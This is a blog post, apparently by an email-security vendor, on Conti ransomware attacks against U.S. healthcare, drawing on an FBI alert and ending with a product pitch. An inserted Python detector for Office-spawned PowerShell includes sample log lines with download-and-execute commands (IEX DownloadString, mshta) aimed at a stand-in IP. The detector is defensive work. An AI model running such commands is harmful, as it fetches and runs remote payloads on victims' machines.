Conti, a notorious ransomware family first identified in 2020, has taken specific aim at U.S. healthcare organizations. In a "Flash Alert" issued last month, the Federal Bureau of Investigation (FBI) identified at least 16 Conti attacks on healthcare and first responder networks within the last year, making that the sector most targeted among the 290 U.S. organizations victimized by Conti during the same period. And just last week, the Wall Street Journal published a profile of "the ruthless hackers behind ransomware attacks on U.S. hospitals," connecting the dots to a total of 235 attacks against general hospitals and inpatient psychiatric facilities, plus dozens of other healthcare facilities in the U.S., since 2018.
What is Conti?
Conti exploits weaknesses in Microsoft Windows and other Microsoft products. It "typically steals victims’ files and encrypts the servers and workstations in an effort to force a ransom payment from the victim," the FBI explains. "If the ransom is not paid, the stolen data is sold or published to a public site controlled by the Conti actors." While ransom demands vary depending on the victim, recent demands have been as high as $25 million.
SEE ALSO: To Pay or to Not Pay for Stolen Data
Though not a formally organized group, the hackers behind Conti are based in Russia and are also responsible for the Ryuk ransomware variant.
Why attack healthcare organizations?
Hospitals and clinics are not being attacked at random, but are being deliberately sought out, the Wall Street Journal reports. "Hospitals are especially lucrative targets because many have lax cybersecurity controls, and the business of life and death is highly vulnerable to extortion," the newspaper explains. "Targeting healthcare networks can delay access to vital information, potentially affecting care and treatment of patients including cancellation of procedures, rerouting to unaffected facilities, and compromise of protected health information," the FBI says. And while some attackers are open to negotiation, this Russian crime ring is not. "They do not care," Coveware CEO Bill Siegel told the Journal. "Patient care, people dying, whatever. It doesn’t matter.” As for first responder networks, the FBI points out that ransomware can increase safety risks for personnel and endanger the public. "Loss of access to law enforcement networks may impede investigative capabilities and create prosecution challenges," the bureau adds.
How are the attacks conducted?
Like most ransomware, Conti and Ryuk lock victims out of their own systems and demand payment to recover the data. "Conti weaponizes Word documents with embedded Powershell scripts," the FBI explains, turning an innocuous-looking email attachment into the first stage of the intrusion. "Actors are observed inside the victim network between four days and three weeks on average before deploying Conti ransomware." During that dwell time the operators rely largely on software and tools already present on the network (the "living off the land" approach), bringing in additional components only as needed "to escalate privileges and move laterally through the network before exfiltrating and encrypting data."
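One way to catch the initial-access step described above in endpoint telemetry, as an added example that is not from the FBI alert or the original post: a small detector that flags an Office application spawning a script host and decodes any PowerShell -EncodedCommand payload so an analyst can read what the macro actually ran. It assumes Sysmon-style Event ID 1 (ProcessCreate) field names (Computer, ParentImage, Image, CommandLine); the log lines, hostnames and the 203.0.113.10 address are constructed for illustration.

```python
"""Detect Office-spawned script hosts in Sysmon-style process-creation logs.

Added example, not code from the FBI alert or the original post. Field names
follow Sysmon Event ID 1 but every event below is constructed for illustration.
"""
import base64
import binascii
import json
import re
from dataclasses import dataclass, field
from typing import List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand (assumed common
# abbreviations); the argument is base64 of a UTF-16LE string.
ENCODED_RE = re.compile(
    r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")


@dataclass
class Finding:
    host: str
    parent: str
    child: str
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def encode_for_powershell(script: str) -> str:
    """The encoding PowerShell expects for -EncodedCommand (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> Optional[Finding]:
    """Apply the detection logic to one ProcessCreate event."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    if not reasons:
        return None  # an admin running plain PowerShell from Explorer is not flagged
    # Context typical of a downloader: hidden window, bypassed policy, web fetch.
    effective = f"{cmdline} {decoded or ''}".lower()
    for marker in ("-w hidden", "-windowstyle hidden", "bypass",
                   "downloadstring", "invoke-webrequest", "iex"):
        if marker in effective:
            reasons.append(f"command line contains '{marker}'")
    return Finding(event.get("Computer", "?"), parent, child, reasons, decoded)


def find_suspicious(log_lines: List[str]) -> List[Finding]:
    """Run the detector over JSON-lines events, skipping malformed lines."""
    findings = []
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # bad line: skip rather than crash the pipeline
        if event.get("EventID") != 1:
            continue
        finding = analyze_event(event)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log (JSON lines); hosts and the URL are assumptions.
SAMPLE_MACRO_PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.10/a")'
OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    json.dumps({"EventID": 1, "Computer": "WS-RADIOLOGY-07",
                "ParentImage": OFFICE_DIR + r"\WINWORD.EXE", "Image": PS_EXE,
                "CommandLine": "powershell.exe -nop -w hidden -enc "
                               + encode_for_powershell(SAMPLE_MACRO_PAYLOAD)}),
    json.dumps({"EventID": 1, "Computer": "WS-ADMIN-01",
                "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
                "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"}),
    json.dumps({"EventID": 1, "Computer": "WS-BILLING-12",
                "ParentImage": OFFICE_DIR + r"\EXCEL.EXE",
                "Image": r"C:\Windows\System32\cmd.exe",
                "CommandLine": "cmd.exe /c mshta http://203.0.113.10/b.hta"}),
    json.dumps({"EventID": 1, "Computer": "WS-RADIOLOGY-07",
                "ParentImage": OFFICE_DIR + r"\WINWORD.EXE",
                "Image": r"C:\Windows\splwow64.exe",
                "CommandLine": r"C:\Windows\splwow64.exe 12288"}),
    "not json at all",
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f.host}: {f.parent} -> {f.child}: {'; '.join(f.reasons)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

Run against the constructed log, the detector raises two findings (the Word-spawned encoded PowerShell downloader and the Excel-spawned cmd/mshta chain) and ignores the administrator's plain PowerShell script and Word's legitimate print-spooler child. The parent/child pairing is the durable signal; the command-line markers only add context, which is why a finding is emitted before they are checked rather than because of them.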
What should victims do?
Although the loss or unauthorized disclosure of confidential company and client information is significant, the FBI strongly discourages organizations from paying ransoms, in part because doing so doesn't guarantee that the attackers will hold up their end of the bargain. "Payment does not guarantee files will be recovered," the FBI alert notes. "It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities." Nonetheless, the FBI acknowledges that victims must act in their own best interest. Whether or not an organization pays a ransom, the FBI urges companies to promptly report ransomware incidents to their local field office or the FBI's 24/7 Cyber Watch (CyWatch). "Doing so provides the FBI with critical information needed to prevent future attacks by identifying and tracking ransomware attackers and holding them accountable under U.S. law." And if protected health information is involved, the HIPAA Breach Notification Rule requires notifying the U.S. Department of Health and Human Services, in addition to the affected individuals.
How can hacks be prevented?
The FBI alert lays out more than a dozen recommendations, including the following:
- Regularly back up data and protect offline backup copies with passwords. Ensure copies of critical data are not accessible for modification or deletion from the systems where the data resides.
- Implement a business continuity plan that includes maintaining and retaining multiple copies of sensitive or proprietary data in a physically separate, secure location (e.g., a hard drive, storage device, or the cloud).
- Install updates and patch operating systems, software, and firmware as soon as they are released.
- Use strong passwords and regularly change passwords. Avoid reusing passwords across multiple accounts.
- Focus on cybersecurity awareness and training. Train employees on information security principles and techniques, as well as emerging cybersecurity risks and vulnerabilities (e.g., ransomware and phishing scams).
Strong email security is a must
The best way to safeguard an organization is a multi-layered security strategy. As far as email is concerned, we recommend a zero-trust security framework, in which no email sender is trusted automatically. Implemented correctly, this lifts the responsibility for catching threats off employees by using technology to block malicious emails before they reach the inbox.
Paubox Email Suite Plus can do this, as part of its overall mission to provide HIPAA compliant email. It blocks incoming phishing messages and other email threats from reaching the inbox. And with our HITRUST CSF certified solution, all outbound emails are encrypted and sent directly from your existing email platform (such as Microsoft 365 or Google Workspace). Moreover, our solution comes with our patented ExecProtect feature, built to block display name spoofing emails, a common tactic in email phishing, and Zero Trust Email requires an additional piece of evidence to authenticate every single email before it is delivered to your team's inboxes. Protect your organization today, starting with strong email security.